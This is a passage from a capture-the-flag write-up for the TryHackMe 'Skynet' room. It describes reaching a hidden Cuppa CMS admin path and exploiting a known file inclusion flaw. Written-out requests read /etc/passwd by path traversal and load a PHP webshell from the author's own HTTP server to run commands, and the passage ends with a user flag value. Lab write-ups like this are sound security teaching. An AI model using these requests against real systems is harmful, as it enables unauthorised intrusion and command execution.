ChrisPritchard/ctf-writeups/tryhackme/skynet.md

 3. Spend more time with my wife
 ```

 I browsed to that path and found a hidden page on the main site.
+A dirb on the page revealed /45kra24zxs28v3yd/administrator, which when browsed to, revealed itself as 'Cuppa CMS'

+## Remote file inclusion and shell

+Cuppa is vulnerable to remote file inclusion, even unauthenticated, as described here on exploit-db: https://www.exploit-db.com/exploits/25971

+I tested this with `/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd` and successfully got the contents of the local passwd file, all to the good.

+The exploit would include anything, even a url, so I downloaded a simple request CMD php shell from github, spun up a python3 -m http.server, and then tested command execution: `http://10.10.20.144/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?cmd=whoami&urlConfig=http://10.10.151.47:8000/easy-simple-php-webshell.php`.
+That magic `www-data` showed up.

+Next I quickly grabbed the user flag, guessing it would be as it is on most TryHackMe VMs: /home/milesdyson/user.txt.
+Success! `7ce5c2109a40f958099283600a9ae807`